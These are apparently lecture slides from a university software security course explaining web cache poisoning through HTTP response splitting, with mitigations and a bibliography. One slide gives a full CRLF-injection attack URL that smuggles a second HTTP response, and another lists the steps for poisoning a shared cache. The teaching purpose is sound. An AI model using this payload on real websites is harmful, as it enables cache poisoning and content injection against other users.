3. About Web Cache poisoning
Domain pioneered by Amit Klein, formerly Director of
Security and Research at Sanctum, Inc.
Allows an attacker to place malicious content on a shared
cache server (such as an proxy server)
All users of that cache will continue to receive the malicious
content until the cache entry is purged.
3
Software Security, FCS Iasi, 2013-2014
4. Related attacks & vulnerabilities
Web Cache poisoning is based on HTTP Response
splitting. The attacker must find a web resource vulnerable
to HTTP response Splitting and exploit that vulnerability.
Cross-User Defacement is also possible via placing
malicious web content for a specific user && stealing
sensitive information
4
Software Security, FCS Iasi, 2013-2014
5. HTTP Response Splitting
Forcing an originator of HTTP messages to emit 2 (or more)
valid (RFC-compliant) messages instead of one.
The result of the application’s failure to reject illegal user input
(malicious/unexpected CR&LF characters – may be found
especially in Location and Set-Cookie headers)
5
Software Security, FCS Iasi, 2013-2014
7. Example – continued [5]
Attack request
http://www.the.site/welcome.jsp?lang=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:
%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContentLength:%2020%0d%0a%0d%0a<html>Gotcha!</html>
Response (actually, 2 responses and some change):
HTTP/1.0 302 Redirect
Location: http://www.the.site/by_lang.jsp?lang=Foo
Will be interpreted as
Response # 1
Connection: Keep-Alive
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Will be interpreted as
Response # 2
!!Injected by attacker!!
Content-Length: 20
<html>Gotcha</html>
Connection: Keep-Alive
Content-Length: 0 …
7
Software Security, FCS Iasi, 2013-2014
Superfluous data, does not
conform to the HTTP Standard
8. Cache Poisoning Attack
Difficult to carry-out in real environment. (many conditions and
pre-requisites)
1) Find a web resource vulnerable to HTTP Response Splitting
2) Force the cache server to flush the actual cache content (Pragma:
no-cache or Cache-Control)
3) Send a specially crafted request, as the previous
4) Send the next request (poisoned resource). The injected Response
#2 will server as a response from Step #3 and will be stored by the
shared web cache server
8
Software Security, FCS Iasi, 2013-2014
9. Attacker - Practical Aspects [4]
Maintain the poisoned resource
Last-Modified header with a future time value
Send the cache poisoning attack every x minutes?
Execute all requests immediately one after another
Take into account the URI length (GET / POST)
Attack scenario depends to the web server implementation
(Microsoft ASP, Jakarta Tomcat, IBM WebSphere etc.):
Where the second message starts?
9
Software Security, FCS Iasi, 2013-2014
10. Victims – Practical Aspects [4]
Web Application Developers
VALIDATE INPUT!! Remove CRs and LFs before embedding
data to HTTP response headers (Location and SetCookie especially)
Web application engine vendors
Disallow CR & LF characters in all HTTP response headers
(requirement for RFC 2616)
Proxy vendors
Avoid sharing server TCP connection among different clients /
virtual hosts
10
Software Security, FCS Iasi, 2013-2014
11. Bibliography
1)
OWASP page for Web cache poisoning
https://www.owasp.org/index.php/Cache_Poisoning
1)
OWASP page for HTTP Response Splitting
https://www.owasp.org/index.php/HTTP_Response_Splitting
1)
2)
3)
4)
OWASP Testing guide v3 (section 4.8.15, Testing for HTTP
Splitting/Smuggling, pages 278-281)
Amit Klein, Http Response Splitting, Web Cache Poisoning Attacks a
Amit Klein, HTTP Message Splitting, Smuggling and Other
Animals, OWASP AppSec Europe, 2006
China's Great Firewall spreads overseas
http://www.computerworld.com/s/article/9174132/China_s_Great_Firewall_s
preads_overseas
11
Software Security, FCS Iasi, 2013-2014